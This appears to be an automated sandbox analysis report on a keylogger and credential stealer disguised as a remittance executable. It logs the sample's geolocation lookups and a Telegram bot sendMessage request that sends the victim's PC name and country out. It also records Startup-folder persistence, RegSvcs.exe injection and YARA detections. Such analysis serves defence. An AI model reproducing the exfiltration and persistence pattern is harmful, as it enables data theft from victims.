                                                                    2024-09-25 13:34:35 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.549736188.114.97.34436488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:36 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-09-25 13:34:36 UTC680INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:36 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23335
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2BgWsMl2zpfgenJgICZspGKzVHC2yqerE0WJewdbOOr59MdFpb5z7x2yCr5zgqlrQUCQVULk%2BXSDkXA9dBr%2FczRJ%2F7L8ZcYj3k%2F9b0yu6EBt0P9GmDxkE1rPpDqog8KyTisuFQTx"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b648698a34345-EWR
                                                                    2024-09-25 13:34:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.549738188.114.97.34436488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:37 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:37 UTC680INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:37 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23336
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEzon3ad0%2FHizUJDlIQRrgSvHlLRumYL33c6csx7VFu6GA5Yt79Nyh6rfZzzJiVPtt4a60YNsJ8Mgb%2FpkGifxy8WfWvFS1HU8ScjHH%2FS7eFN00bxA%2F%2F8pjdxfaUpq9BJ7osQ9bKW"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b648d7f0c4232-EWR
                                                                    2024-09-25 13:34:37 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.549740188.114.97.34436488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:38 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:39 UTC674INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:39 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23338
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pIj4Rstc6xOk%2FQjH7H1NovWOtSeQ1LW%2FL3ummIgTYB6K9xvH7Ngk6OaAHNZITA1wEvnPdcNKgzyLRmQS0VXlvdJ69ge7fa36b4WapKHFlU9LK5ovryqWRZao1eSYEQH0BkaamJNF"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b6495cf6ac3fd-EWR
                                                                    2024-09-25 13:34:39 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.549742188.114.97.34436488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:40 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-09-25 13:34:40 UTC680INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:40 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23339
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V7j5bmjgMX29ONH24%2B0w0O2QbseksYD%2F41PNCUGyP%2FrCt0CDUbbz5NF86YjJXGv%2BQhTLqNhVO9%2BOBTBTW2zUvs6cTmQ8xJrs1B3V4KYSM15T2WeZwgHxNGCgHdpP6aLgT2dUUmxU"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b649c9f457c99-EWR
                                                                    2024-09-25 13:34:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.549744188.114.97.34436488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:41 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-09-25 13:34:41 UTC672INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:41 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23340
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zo4WbkH%2Foe7vdkqBsTv1StHPX2oJ79gp7KbOBAXfPm7nzhI3uQzsjzmR2fzPgO0I2UY17tX4L6yZelynmP3SK2LKnUIiXqabwCd71dUf0bR2VHCT7UUMaV5SLSsNdapAeMExxy9y"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b64a509098cdd-EWR
                                                                    2024-09-25 13:34:41 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.549745149.154.167.2204436488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:42 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2021:39:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                    Host: api.telegram.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:42 UTC344INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.18.0
                                                                    Date: Wed, 25 Sep 2024 13:34:42 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 55
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2024-09-25 13:34:42 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:09:34:03
                                                                    Start date:25/09/2024
                                                                    Path:C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'275'767 bytes
                                                                    MD5 hash:34280E3A145D8D865EFEDF422B568E46
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:09:34:08
                                                                    Start date:25/09/2024
                                                                    Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'275'767 bytes
                                                                    MD5 hash:34280E3A145D8D865EFEDF422B568E46
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:09:34:10
                                                                    Start date:25/09/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                                                                    Imagebase:0x290000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4560135222.000000000039D000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4560135222.0000000000395000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4562656465.00000000026CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:5
                                                                    Start time:09:34:22
                                                                    Start date:25/09/2024
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                                                                    Imagebase:0x7ff6ffbf0000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:09:34:25
                                                                    Start date:25/09/2024
                                                                    Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'275'767 bytes
                                                                    MD5 hash:34280E3A145D8D865EFEDF422B568E46
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:09:34:29
                                                                    Start date:25/09/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                    Imagebase:0x990000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.4560074410.0000000000423000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:3.1%
                                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                                      Signature Coverage:8.8%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:35
                                                                      execution_graph 86074 4010e0 86077 401100 86074->86077 86076 4010f8 86078 401113 86077->86078 86079 401184 86078->86079 86080 40114c 86078->86080 86082 401120 86078->86082 86110 401182 86078->86110 86115 401250 86079->86115 86083 401151 86080->86083 86084 40119d 86080->86084 86081 40112c DefWindowProcW 86081->86076 86082->86081 86136 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 86082->86136 86086 401219 86083->86086 86087 40115d 86083->86087 86089 4011a3 86084->86089 86090 42afb4 86084->86090 86086->86082 86093 401225 86086->86093 86091 401163 86087->86091 86092 42b01d 86087->86092 86088 401193 86088->86076 86089->86082 86096 4011b6 KillTimer 86089->86096 86097 4011db SetTimer RegisterWindowMessageW 86089->86097 86131 40f190 10 API calls 86090->86131 86098 42afe9 86091->86098 86099 40116c 86091->86099 86092->86081 86135 4370f4 52 API calls 86092->86135 86147 468b0e 74 API calls __crtGetStringTypeA_stat 86093->86147 86130 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 86096->86130 86097->86088 86102 401204 CreatePopupMenu 86097->86102 86133 40f190 10 API calls 86098->86133 86099->86082 86104 401174 86099->86104 86100 42b04f 86137 40e0c0 86100->86137 86102->86076 86132 45fd57 65 API calls __crtGetStringTypeA_stat 86104->86132 86108 42b00e 86134 401a50 331 API calls 86108->86134 86109 4011c9 PostQuitMessage 86109->86076 86110->86081 86111 42afe4 86111->86088 86114 42afdc 86114->86081 86114->86111 86116 401262 __crtGetStringTypeA_stat 86115->86116 86117 4012e8 86115->86117 86148 401b80 86116->86148 86117->86088 86119 40128c 86120 4012d1 KillTimer SetTimer 86119->86120 86121 4012bb 86119->86121 86122 4272ec 86119->86122 86120->86117 86123 4012c5 86121->86123 86124 42733f 86121->86124 86125 4272f4 Shell_NotifyIconW 86122->86125 86126 42731a Shell_NotifyIconW 86122->86126 86123->86120 86127 427393 Shell_NotifyIconW 86123->86127 86128 427348 Shell_NotifyIconW 86124->86128 86129 42736e Shell_NotifyIconW 86124->86129 86125->86120 86126->86120 86127->86120 86128->86120 86129->86120 86130->86109 86131->86088 86132->86114 86133->86108 86134->86110 86135->86110 86136->86100 86139 40e0e7 __crtGetStringTypeA_stat 86137->86139 86138 40e142 86141 40e184 86138->86141 86246 4341e6 63 API calls __wcsicoll 86138->86246 86139->86138 86140 42729f DestroyIcon 86139->86140 86140->86138 86143 40e1a0 Shell_NotifyIconW 86141->86143 86144 4272db Shell_NotifyIconW 86141->86144 86145 401b80 54 API calls 